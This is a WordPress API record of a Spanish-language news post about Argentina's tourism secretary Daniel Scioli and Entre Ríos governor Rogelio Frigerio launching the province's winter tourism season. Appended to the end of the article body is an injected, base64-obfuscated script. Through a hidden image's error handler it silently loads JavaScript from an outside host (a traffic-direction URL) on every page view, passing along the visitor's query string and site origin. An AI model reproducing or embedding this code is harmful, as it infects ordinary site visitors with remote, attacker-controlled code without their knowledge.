{"id":9711,"date":"2025-06-24T08:16:41","date_gmt":"2025-06-24T11:16:41","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9711"},"modified":"2025-08-13T15:26:51","modified_gmt":"2025-08-13T18:26:51","slug":"scioli-aseguro-que-entre-rios-se-encamina-a-ser-una-de-las-grandes-revelaciones-en-materia-de-desarrollo-turistico","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9711","title":{"rendered":"Scioli asegur\u00f3 que Entre R\u00edos se encamina a ser \u201cuna de las grandes revelaciones en materia de desarrollo tur\u00edstico\u201d"},"content":{"rendered":"\n<p><strong><em>Lo dijo el funcionario nacional durante el lanzamiento de la propuesta de turismo invernal de esta provincia.<\/em><\/strong><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" width=\"457\" height=\"694\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2.jpeg\" alt=\"\" class=\"wp-image-9688\" style=\"width:238px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2.jpeg 457w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2-198x300.jpeg 198w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2-277x420.jpeg 277w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2-320x486.jpeg 320w\" sizes=\"(max-width: 457px) 100vw, 457px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><sup><mark class=\"has-inline-color has-vivid-green-cyan-color\">Publicidad:<\/mark><\/sup><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>El secretario de Turismo, Ambiente y Deportes,&nbsp;<strong>Daniel Scioli<\/strong>, particip\u00f3 esta tarde del evento en el que&nbsp;<strong>Entre R\u00edos<\/strong>&nbsp;present\u00f3 la oferta de actividades y atractivos preparados para recibir a los visitantes esta temporada en su jurisdicci\u00f3n. Lo hizo junto al gobernador,&nbsp;<strong>Rogelio Frigerio<\/strong>, en la casa de la provincia.<\/p>\n\n\n\n<p><strong>Scioli<\/strong>&nbsp;destac\u00f3&nbsp;<em>\u00abel compromiso que tiene el gobernador con la promoci\u00f3n del turismo, hace que Entre R\u00edos se encamine a ser una de las grandes revelaciones en materia de desarrollo tur\u00edstico porque articula con el sector privado, busca romper la estacionalidad y pone en valor su diversificaci\u00f3n marcada por la hospitalidad para la gastronom\u00eda y sus expresiones culturales\u00bb<\/em>. En ese sentido, a\u00f1adi\u00f3:&nbsp;<em>\u00abLo que nos convoca hoy es generar mejores condiciones para que las familias puedan elegir un destino maravilloso, con promociones y descuentos\u00bb<\/em>.<\/p>\n\n\n\n<p>Asimismo, el secretario reiter\u00f3 que&nbsp;<em>\u00abel Estado nacional y el presidente Milei han dado el marco para que el sector privado pueda desarrollar todo su potencial\u201d. \u201cSe ha bajado dr\u00e1sticamente la inflaci\u00f3n, se ha recuperado el cr\u00e9dito y se dan las condiciones de seguridad ciudadana\u00bb<\/em>, argument\u00f3.<\/p>\n\n\n\n<p>Por otro lado, se refiri\u00f3 al modo en el que se calcula la cuenta de turismo a nivel pa\u00eds, en la que&nbsp;<em>\u201cest\u00e1n incluidos, injustamente, todas las compras que se hacen en el exterior\u201d<\/em>, como los gastos en plataformas audiovisuales, comercio electr\u00f3nico y apuestas en l\u00ednea.&nbsp;<em>\u201cEsto se va a sincerar y vamos a tener estad\u00edsticas concretas\u201d, \u201cal igual que lo que gasta un turista extranjero cuando viene al pa\u00eds\u201d<\/em>, se\u00f1al\u00f3 al referirse al estimado de 54 d\u00f3lares diarios por visitante que ingresa al pa\u00eds, cifra que&nbsp;<em>\u201cse subevaluaba\u201d. \u201cEn el mes de julio, por primera vez en diez a\u00f1os, esto se va a corregir\u201d<\/em>, expres\u00f3.<\/p>\n\n\n\n<p>Por su parte,&nbsp;<strong>Frigerio<\/strong>&nbsp;afirm\u00f3:&nbsp;<em>\u201cHablar bien de uno es inc\u00f3modo. Pero estamos ac\u00e1 para lanzar nuestra temporada de invierno e invitarlos a que nos vengan a conocer, sabiendo que no se van a arrepentir porque el que viene a Entre R\u00edos siempre vuelve. Tenemos paisajes, actividades, historia, enoturismo, nuestra gente\u201d<\/em>.<\/p>\n\n\n\n<p>El gobernador tambi\u00e9n dijo:&nbsp;<em>\u00abNecesitamos generar trabajo privado de calidad en nuestra provincia\u201d<\/em>, lo cual vincul\u00f3 con el \u201cenorme potencial\u201d demostrado por Entre R\u00edos en materia tur\u00edstica.<\/p>\n\n\n\n<p>A su turno, la presidenta de la C\u00e1mara Argentina de Turismo (CAT),&nbsp;<strong>Laura Teruel<\/strong>, expres\u00f3:&nbsp;<em>\u201cEstamos disponibles para seguir potenciando todo lo que veo que est\u00e1n articulando desde el sector privado, como lo importante de este pasaporte\u201d<\/em>. Felicit\u00f3 al gobernador y al secretario nacional por potenciar el turismo&nbsp;<em>\u201cde cada una de las provincias de la Argentina y de Argentina en el exterior\u201d<\/em>&nbsp;y manifest\u00f3 su disposici\u00f3n para&nbsp;<em>\u201crecorrer todas las provincias de la Argentina y conocer todos los territorios para poder brindar as\u00ed todo nuestro potencial del sector privado\u201d<\/em>.<\/p>\n\n\n\n<p>Por \u00faltimo, el secretario de Turismo de Entre R\u00edos,&nbsp;<strong>Jorge Satto<\/strong>, describi\u00f3:&nbsp;<em>\u201cSon diez las microrregiones que tenemos planteadas y estamos trabajando en su institucionalizaci\u00f3n. Adem\u00e1s, agradeci\u00f3 a las autoridades y al sector privado y celebr\u00f3 \u201cel poder contar con todo este marco de actores presentes\u201d. \u201cEl turismo es un motor para la econom\u00eda entrerriana\u201d<\/em>, puntualiz\u00f3.<\/p>\n\n\n\n<p>En el encuentro, tambi\u00e9n se realiz\u00f3 el relanzamiento de la iniciativa&nbsp;<strong>\u201cPasaporte Entre R\u00edos\u201d<\/strong>&nbsp;y se inici\u00f3 la campa\u00f1a promocional denominada&nbsp;<strong>#ModoCarpincho<\/strong>, mediante un bus con im\u00e1genes de la propuesta tur\u00edstica de la provincia que recorri\u00f3 puntos neur\u00e1lgicos del centro porte\u00f1o y que permiti\u00f3 la entrega de material de difusi\u00f3n.<\/p>\n\n\n\n<p>Tambi\u00e9n form\u00f3 parte del encuentro&nbsp;<strong>Jos\u00e9 Mouli\u00e1<\/strong>, presidente de&nbsp;<strong>Casa de Entre R\u00edos<\/strong>, junto a legisladores, intendentes, autoridades del&nbsp;<strong>Ente Mixto de Turismo<\/strong>&nbsp;de la provincia, instituciones y representantes del sector.<\/p><p><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Lo dijo el funcionario nacional durante el lanzamiento de la propuesta de turismo invernal de esta provincia. El secretario de Turismo, Ambiente y Deportes,&nbsp;Daniel Scioli, particip\u00f3 esta tarde del evento en el que&nbsp;Entre R\u00edos&nbsp;present\u00f3 la oferta de actividades y atractivos preparados para recibir a los visitantes esta temporada en su jurisdicci\u00f3n. Lo hizo junto al [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9712,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[30],"tags":[],"class_list":["post-9711","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-temas-relacionados"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9711","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9711"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9711\/revisions"}],"predecessor-version":[{"id":9900,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9711\/revisions\/9900"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9712"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9711"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9711"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9711"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}